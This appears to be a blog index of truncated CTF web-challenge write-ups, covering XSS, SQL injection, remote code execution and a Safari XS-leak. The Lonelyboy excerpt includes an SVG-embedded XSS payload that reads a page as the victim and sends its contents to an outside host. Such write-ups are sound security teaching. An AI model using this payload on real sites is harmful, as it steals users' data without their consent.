Faust CTF 22 - AdminCrashBoard
RCE-As-A-Service (RAAS) This challenge was a webapp with ports 5000 and 22 open. On port 5000 runs a webapp called admincrashboard written in flask. User management is done with PAM, so registering a user creates a linux user on the system. SSH is running on port 22. The webapp allows registered and logged-in users to upload so-called buttons that can be executed on the server. Example button: 1 2 3 4 5 <?...
XS-Leaks - Detecting XSS-Auditor in Safari
Safari (13.0.4 and newer) will not log iframe requests in the Performance API list, when the iframe page is blocked by the XSS-Auditor. So the length of performance.getEntries() can leak the status of the Auditor. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 const check = async(url) => { let perfEntries = performance.getEntries().length return new Promise(r => { let frame = document.createElement('iframe') frame.src = url frame....
Hacklu 2019 - Car Repair Shop
Description Your Car broke down?! Come to our shop, we repair all cars! Even very old ones. Enter the Shop Challenge Source New Github Demo Solution Car Repair Shop is a classic XSS challenge I created for the Hack.lu 2019 CTF. Looking at the static HTML code you find jQuery and two custom scripts. One defines a car class: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 class Car { constructor(type, model, color, pic, key="") { this....
Ctfzone 2018 - Piggy Bank
Description Piggy-Bank CTFZONE 2018 Web Challenge [100] Hack some bank for me. http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/ This is just a quick and dirty writeup. First, we created an account, logged in and looked for interesting stuff. There was a VIP Section: “This section is available only to privileged pigs with money in pockets. Transfer to the piggy-bank 1 000 000 coins and become important.” So we assumed this is what we had to do....
Seccon 2017 - automatic_door
Description automatic_door Seccon2017 [500] Get shell, and execute /flag_x http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95/ Skip Code 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 <?...
MeePwn 2017 - Lonelyboy
Very quick little write-up: Get a friend account using xss in svg: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> var xhr = new XMLHttpRequest(); xhr.open('GET','/home.php?email_address_of_tsu_friend=m@m.de'); xhr.onload = function () { var myImage = new Image(100, 200); myImage.src ='http://example.com:81/'+btoa(xhr.responseText); }; xhr....
Ctfzone 2017 - Timehackers
On the contacts page, we were able to send links to the admin he then would visit and we assumed that we had to steal credentials to get into the admin.php page. After we were not able to steal any cookies or find XSS on the site we used nmap to scan the host. It showed that both 80 and 8080 were open, later a hint was released hinting that there was a difference between them....
MeePwn 2017 - Br0kenMySQL
This was a 3 stage SQLi challenge we solved during the MeePwn CTF. Shout out to Sceptic who solved the first stage and told me to look at the next one. Br0kenMySQL 100 pts BabeTrick 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 <title>Br0kenMySQL</title><h1><pre> <p style='color:Red'>Br0kenMySQL</p> <?...
Hacklu 2015 - Prof. M. Eista Hax
Challenge description: Professor M. Eista Hax uses a digital tool to manage all his students. He is very happy with the system, but it does have one drawback: it does not support multiple users. This is a problem, because M. Eista Hax has employees who need access as well. To solve this he writes a super modern, highly encrypted web application to share the password with authorized users. Problem solved....